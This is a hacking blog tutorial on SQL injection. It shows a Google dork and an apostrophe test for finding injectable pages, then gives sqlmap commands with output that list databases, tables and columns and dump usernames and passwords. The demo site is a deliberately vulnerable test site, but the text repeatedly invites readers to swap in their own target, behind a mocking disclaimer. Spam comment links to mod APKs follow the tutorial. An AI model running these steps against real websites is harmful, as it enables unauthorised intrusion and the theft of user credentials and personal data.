Greetings to the Hackers of the Globe. With new security vulnerabilities discovered everyday there's been a vulnerability that has been existing a long time from now and still is very handy to hack Websites.. It's Called SQL injection.
According to Wikipedia:
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered forstring literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
Now, we know what is SQL injection. There's a handy tool called SQL Map.
According to SQL Maps SourceForge Wiki
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers
So Now we have a basic knowledge about SQL injection and SQL Map.. Let's ride over to some hacking examples:
Disclaimer : The tutorial below is for educational purpose, I'm not responsible if you find yourself behind
the bars for attempting an Unethical Act....
Vulnerable Page:
Now, you have selected your target but how do we perform SQL injection.. For that we need a SQL injection vulnerable page in that site..In simple words you cannot hack any site with it domain like hackerslite.in . For that you'll need a page which is vulnerable to SQL injection..
Finding The Vulnerable Page:
For my demonstration, I'm using a site testphp.vulnweb.com . This site is made intentionally for testing purposes..
1. Go to Google and make a search : site:testphp.vulnweb.com inurl:php? (replace testphp.vulnweb.com with your desired target)
2. This brings me some search results. Now I open the first site i.e (http://testphp.vulnweb.com/listproducts.php?cat=1) . Now, I test this site weather this is vulnerable to SQL injection.. I do this by typing a ' at the end of the link.. example http://testphp.vulnweb.com/listproducts.php?cat=1'
This brings me a error(see image below)
This shows that the following site is vulnerable to SQL injection. So, now we have found out the target page, lets get into hacking with SQL Map...
HACKING WITH SQLMAP:
Now, fireup sql map....You may use SQL map in kali or another OS (I'm on BackBox).
The First Code i type in the terminal is:
sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 --dbs
You should replace the url with your target page...SQL Map may ask you several time for yes or no.. simply
use no and hit enter every time...
The Following code brings me two databases: acuart and information_schema
Now when I have the database name, lets retrieve the table names, the code for that is:
sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
Here acuart is our database name...This code retrives me some tables :
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
Now, when I have the database name as well as table name, we'll now retrieve the columns..The code is:
sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
The Following code retrieves me some columns names:
address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| name | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
So, now lets dump the username and password.. Use the code:
sqlmap -u testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C uname,pass --dump
Voila, the following code dumps me the sites username and password
Disclaimer : The tutorial above was for educational purpose, I'm not responsible if you find yourself behind
the bars for attempting an Unethical Act
That was a simple tutorial on how to hack a website using SQL injection.....
Follow me on twitter @amit_sharma48 for regular updates on each post...
Till then like our Facebook page www.facebook.com/hackerslite
Pornhub MOD APK modyolo
ReplyDeletefoxi mod apk
momix mod APK DOWNLOAD
sony liv Premium Mod Apk Technical ATG
Mix root mods
evergreen class 9 science social maths pdf DOWNLOAD